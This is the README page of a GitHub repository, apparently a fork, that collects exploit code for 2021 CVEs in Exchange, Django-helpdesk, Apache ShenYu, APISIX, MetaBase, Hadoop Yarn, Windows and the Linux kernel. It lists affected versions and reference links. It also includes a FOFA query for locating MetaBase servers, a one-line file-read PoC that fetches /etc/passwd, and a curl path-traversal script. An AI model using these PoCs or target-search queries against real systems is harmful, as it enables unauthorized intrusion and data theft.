Skip to content
/ expbox Public
forked from pythonman083/expbox

Vulnerability Exploitation Code Collection Repository

Notifications You must be signed in to change notification settings

Qlng/expbox

 
 

Repository files navigation

[object Object]

Introduction

expbox is an exploit code collection repository

List

CVE-2021-41349 Exchange XSS PoC

<= Exchange 2013 update 23
<= Exchange 2016 update 22
<= Exchange 2019 update 11

CVE-2021–3945 Django-helpdesk stored XSS PoC

<= 0.3.0

CVE-2021-37580 Apache ShenYu 2.3.0/2.4.0 authentication bypass

Ref: https://github.com/fengwenhua/CVE-2021-37580

Hadoop Yarn RPC RCE

Ref: https://github.com/cckuailong/YarnRpcRCE

CVE-2021-41277 MetaBase Arbitrary File Read

MetaBase < 0.40.5
1.0.0 <= MetaBase < 1.40.5

FOFA:

app="Metabase"

PoC:

GET /api/geojson?url=file:/etc/passwd HTTP/1.1

CVE-2021-42321 Exchange Post-Auth RCE

<= Exchange 2016 update 22
<= Exchange 2019 update 11

Windows 0day - InstallerFileTakeOver image

Ref:https://github.com/klinix5/InstallerFileTakeOver

CVE-2021-43557 Apache APISIX: Path traversal in request_uri variable

#/bin/bash

kubectl exec -it -n ingress-apisix apisix-dc9d99d76-vl5lh -- curl --path-as-is http://127.0.0.1:9080$1 -H 'Host: app.test'

CVE-2021-43267 Linux Kernel TIPC RCE

5.10-rc1 < Linux kernel < 5.15

Reference: https://haxx.in/posts/pwning-tipc/

Nginx 0.7.0 to 1.17.9 Host injection

Ref: https://twitter.com/infosec_90/status/1464337963240861702

Note

All content comes from the Internet, if there is a copyright problem, please contact me to delete.

About

Vulnerability Exploitation Code Collection Repository

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • C 52.1%
  • Python 47.9%